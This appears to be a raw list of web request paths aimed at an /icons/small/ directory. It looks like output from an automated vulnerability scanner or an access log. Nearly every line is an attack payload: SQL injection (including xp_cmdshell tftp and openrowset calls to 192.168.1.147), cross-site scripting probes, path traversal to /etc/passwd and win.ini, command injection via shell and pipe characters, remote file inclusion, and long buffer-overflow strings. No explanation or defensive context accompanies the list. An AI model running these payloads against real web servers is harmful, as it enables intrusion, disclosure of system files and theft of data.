/icons/small/?C=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/small/?C=AVAK$(RETURN_CODE)OS
/icons/small/?C=Cdows\win.ini
/icons/small/?C=Cnt\win.ini
/icons/small/?C=Ct.ini
/icons/small/?C=D;O=A
/icons/small/?C=id|
/icons/small/?C=M;O=A
/icons/small/?C=N;O=D
/icons/small/?C=N;O=D"+alert(xss)+"
/icons/small/?C=N;O=D#&<(,+">;
/icons/small/?C=N;O=D%22%2Balert%2827656%29%2B%22
/icons/small/?C=N;O=D%27%2Balert%2827652%29%2B%27
/icons/small/?C=N;O=D%2Balert%2827660%29%2B
/icons/small/?C=N;O=D%a5'%20having%201=1--
/icons/small/?C=N;O=D%uFF07
/icons/small/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2827552%29%3C%2Fscript%3E=123
/icons/small/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2827556%29%3C%2Fscript%3E=123
/icons/small/?C=N;O=D'
/icons/small/?C=N;O=D'"WFXSSProbe)/>
/icons/small/?C=N;O=D'%20+%20'somechars
/icons/small/?C=N;O=D'%20and%20'barfoo'='foobar
/icons/small/?C=N;O=D'%20and%20'barfoo'='foobar'%20--
/icons/small/?C=N;O=D'%20and%20'barfoo'='foobar')%20--
/icons/small/?C=N;O=D'%20and%20'foobar'='foobar
/icons/small/?C=N;O=D'%20and%20'foobar'='foobar'%20--
/icons/small/?C=N;O=D'%20and%20'foobar'='foobar')%20--
/icons/small/?C=N;O=D'%20exec%20master..xp_cmdshell%20'vol'--
/icons/small/?C=N;O=D'%20having%201=1--
/icons/small/?C=N;O=D'%20or%20'foobar'='foobar
/icons/small/?C=N;O=D'%20or%20'foobar'='foobar'%20--
/icons/small/?C=N;O=D'%20or%20'foobar'='foobar')%20--
/icons/small/?C=N;O=D'%20||%20'somechars
/icons/small/?C=N;O=D'%20||%20UTL_HTTP.REQUEST('http2.168.1.147QL_Injection_Validation')%20||%20'
/icons/small/?C=N;O=D'+alert(xss)+'
/icons/small/?C=N;O=D';
/icons/small/?C=N;O=D';%20exec%20master..xp_cmdshell%20'tftp%20192.168.1.147%20GET%20SQL_Injection_Validation'--
/icons/small/?C=N;O=D';%20select%20*%20from%20dbo.sysdatabases--
/icons/small/?C=N;O=D';%20select%20*%20from%20master..sysmessages--
/icons/small/?C=N;O=D';%20select%20*%20from%20openrowset('sqloledb','Network=DBMSSOCN;Address=192.168.1.147,9999;uid=myUsr;pwd=myPass;timeout=5','select%20foo%20from%20bar')--
/icons/small/?C=N;O=D';%20select%20*%20from%20sys.dba_users--
/icons/small/?C=N;O=D';%20select%20@@version,1,1,1--
/icons/small/?C=N;O=D)%20having%201=1--
/icons/small/?C=N;O=D*/--></script><script>alert(xss)</script>
/icons/small/?C=N;O=D+alert(xss)+
/icons/small/?C=N;O=D1%20having%201=1--
/icons/small/?C=N;O=DWFXSSProbe
/icons/small/?C=N;O=D\'%20having%201=1--
/icons/small/?C=S;O=A
/icons/small/?C=somechars'%20+%20'N;O=D
/icons/small/?C=somechars'%20||%20'N;O=D
/icons/small/?C=WF'SQL"Probe;A--B
/icons/small/?C=\"
/icons/small/?C=\'
/icons/small/?C=\..\..\..\..\..\..\..\..\boot.ini
/icons/small/?C=\..\..\..\..\..\..\..\..\windows\win.ini
/icons/small/?C=\..\..\..\..\..\..\..\..\winnt\win.ini
/icons/small/?C=\u003Cscript\u003Ealert\u002827634\u0029\u003C/script\u003E
/icons/small/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini
/icons/small/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/icons/small/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/icons/small/?M=A
/icons/small/?S=D
/icons/small/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/small/access.log
/icons/small/access_log
/icons/small/accounts.asp
/icons/small/ackcmdc.exe
/icons/small/action.php?action=addcomment
/icons/small/add_category.asp
/icons/small/admin.asp
/icons/small/admin.aspx
/icons/small/admin.cfg
/icons/small/admin.cfm
/icons/small/admin.cgi
/icons/small/admin.conf
/icons/small/admin.dat
/icons/small/admin.data
/icons/small/admin.db
/icons/small/admin.dbf
/icons/small/admin.exe
/icons/small/admin.htm
/icons/small/admin.html
/icons/small/admin.htx
/icons/small/admin.ini
/icons/small/admin.lst
/icons/small/admin.php
/icons/small/admin.php3
/icons/small/admin.pl
/icons/small/admin.pw
/icons/small/admin.shtml
/icons/small/admin.txt
/icons/small/admin.udl
/icons/small/admin/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/small/admins.htx
/icons/small/admin_/
/icons/small/admin_/help/..%255Cplsql.conf
/icons/small/adovbs.inc
/icons/small/adSamples/config/site.csc
/icons/small/advwedadmin/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/small/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:")|
/icons/small/alibaba.pl?|dir%20..\\..\\..\\..\\..\\..\\..\\,
/icons/small/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/icons/small/allmanage.pl
/icons/small/allmanageup.pl
/icons/small/alya.cgi
/icons/small/amadmin.pl
/icons/small/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd
/icons/small/ans.pl?p=../../../../bin/command
/icons/small/application.cfm
/icons/small/architext_query.pl
/icons/small/asp/samples/viewcode.asp?file=index.asp
/icons/small/aspupload/Test11.asp
/icons/small/aspuploads/Test11.asp
/icons/small/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/icons/small/batch_add.asp
/icons/small/batch_manage.asp
/icons/small/bbs.pl%3F+.htr
/icons/small/bb_smilies.php3
/icons/small/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/icons/small/bdir.htr
/icons/small/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
/icons/small/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
/icons/small/cgi-bin/htimage.exe?2,2
/icons/small/cgitest.exe?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/icons/small/ChangeLog
/icons/small/changelog.htm
/icons/small/changelog.html
/icons/small/CHANGELOG.txt
/icons/small/CHANGES
/icons/small/CHANGES.txt
